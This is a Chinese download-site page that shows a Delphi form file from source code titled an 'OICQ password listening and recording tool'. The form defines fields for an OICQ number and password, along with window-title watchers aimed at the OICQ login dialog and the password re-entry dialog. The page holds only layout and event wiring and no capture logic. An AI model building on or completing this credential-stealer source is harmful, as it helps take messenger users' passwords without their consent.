⭐ 欢迎来到虫虫下载站! | 📦 资源下载 📁 资源专辑 ℹ️ 关于我们
⭐ 虫虫下载站

📄 mainunit.dfm

📁 OICQ 密码监听记录工具3.0源程序
💻 DFM
字号:
object MainForm: TMainForm
  Left = 688
  Top = 462
  BorderStyle = bsDialog
  Caption = '三陀工作室'
  ClientHeight = 57
  ClientWidth = 155
  Color = clBtnFace
  Font.Charset = DEFAULT_CHARSET
  Font.Color = clWindowText
  Font.Height = -11
  Font.Name = 'MS Sans Serif'
  Font.Style = []
  OldCreateOrder = False
  OnCloseQuery = FormCloseQuery
  OnCreate = FormCreate
  PixelsPerInch = 96
  TextHeight = 13
  object Label1: TLabel
    Left = 8
    Top = 9
    Width = 26
    Height = 13
    Caption = 'OICQ'
    Font.Charset = DEFAULT_CHARSET
    Font.Color = clBlue
    Font.Height = -11
    Font.Name = 'MS Sans Serif'
    Font.Style = []
    ParentFont = False
  end
  object Label2: TLabel
    Left = 8
    Top = 36
    Width = 28
    Height = 13
    Caption = 'PASS'
    Font.Charset = DEFAULT_CHARSET
    Font.Color = clBlue
    Font.Height = -11
    Font.Name = 'MS Sans Serif'
    Font.Style = []
    ParentFont = False
  end
  object Edit1: TEdit
    Left = 44
    Top = 5
    Width = 100
    Height = 21
    Enabled = False
    Font.Charset = DEFAULT_CHARSET
    Font.Color = clWindowText
    Font.Height = -12
    Font.Name = 'MS Sans Serif'
    Font.Style = []
    ParentFont = False
    ReadOnly = True
    TabOrder = 0
  end
  object Edit2: TEdit
    Left = 44
    Top = 31
    Width = 100
    Height = 21
    Enabled = False
    Font.Charset = DEFAULT_CHARSET
    Font.Color = clWindowText
    Font.Height = -12
    Font.Name = 'MS Sans Serif'
    Font.Style = []
    ParentFont = False
    ReadOnly = True
    TabOrder = 1
  end
  object WatchTitle1: TWatchTitle
    Tag = 1
    Enabled = True
    Title = 'OICQ用户登录'
    FindClassname = '#32770'
    OnHandleActiveEvent = WatchTitle1HandleActiveEvent
    OnHandleStartEvent = WatchTitle1HandleStartEvent
    OnHandleEndEvent = WatchTitle1HandleEndEvent
    OnHandleFreeEvent = WatchTitle1HandleFreeEvent
    Left = 44
    Top = 58
  end
  object WatchTitle2: TWatchTitle
    Tag = 2
    Enabled = True
    Title = '请再次输入登录密码'
    FindClassname = '#32770'
    OnHandleActiveEvent = WatchTitle1HandleActiveEvent
    OnHandleStartEvent = WatchTitle1HandleStartEvent
    OnHandleEndEvent = WatchTitle1HandleEndEvent
    OnHandleFreeEvent = WatchTitle1HandleFreeEvent
    Left = 84
    Top = 58
  end
  object Timer1: TTimer
    OnTimer = Timer1Timer
    Left = 123
    Top = 58
  end
end

⌨️ 快捷键说明

复制代码 Ctrl + C
搜索代码 Ctrl + F
全屏模式 F11
切换主题 Ctrl + Shift + D
显示快捷键 ?
增大字号 Ctrl + =
减小字号 Ctrl + -